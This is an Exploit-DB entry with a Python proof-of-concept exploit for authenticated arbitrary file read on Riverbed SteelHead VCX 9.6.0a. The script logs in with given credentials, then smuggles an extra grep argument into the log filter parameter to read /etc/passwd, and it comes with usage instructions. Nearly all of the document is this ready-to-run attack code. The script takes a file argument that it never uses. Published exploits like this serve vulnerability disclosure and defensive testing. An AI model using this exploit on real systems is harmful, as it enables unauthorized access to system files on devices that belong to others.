Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read

EDB-ID:

42101

CVE:

N/A




Platform:

Linux

Date:

2017-06-01


# Exploit title : Arbitry file reading by authenticated users on Riverbed SteelHead VCX
# Vendor: Riverbed
# Author: Gregory DRAPERI <gregory.draper_at_gmail.com>
# Date: 03/2017
# Software Link: https://www.riverbed.com/gb/products/steelhead/Free-90-day-Evaluation-SteelHead-CX-Virtual-Edition.html
# Version: SteelHead VCX (VCX255U) (x86_64) 9.6.0a
import sys
import requests


def exploit(address, login, password,file):
    s = requests.Session()
    url = address
    try:
        r1 = s.get(url+"/login?next=/");
        cookies = requests.utils.dict_from_cookiejar(s.cookies);
        csrf = cookies["csrftoken"]
        authentication = {'csrfmiddlewaretoken': csrf, '_fields': "{\"username\":\""+login+"\",\"password\":\""+password+"\",\"legalAccepted\":\"N/A\",\"userAgent\":\"\"}"}
        r2 = s.post(url+"/login?next=/",  data=authentication)
        r3 = s.get(url+"/modules/common/logs?filterStr=msg:-e .* /etc/passwd ")
        print r3.text

    except Exception as e:
        print "\n! ERROR: %s" % e
    return False



if len(sys.argv) < 4:
    print "Usage: exploit.py <target> <login> <password> <file>\n"
    print "Example: exploit.py http://192.168.1.2 admin password /etc/passwd\n"
    quit()
target = sys.argv[1]
login = sys.argv[2]
password = sys.argv[3]
file = sys.argv[4]
exploit(target,login,password,file)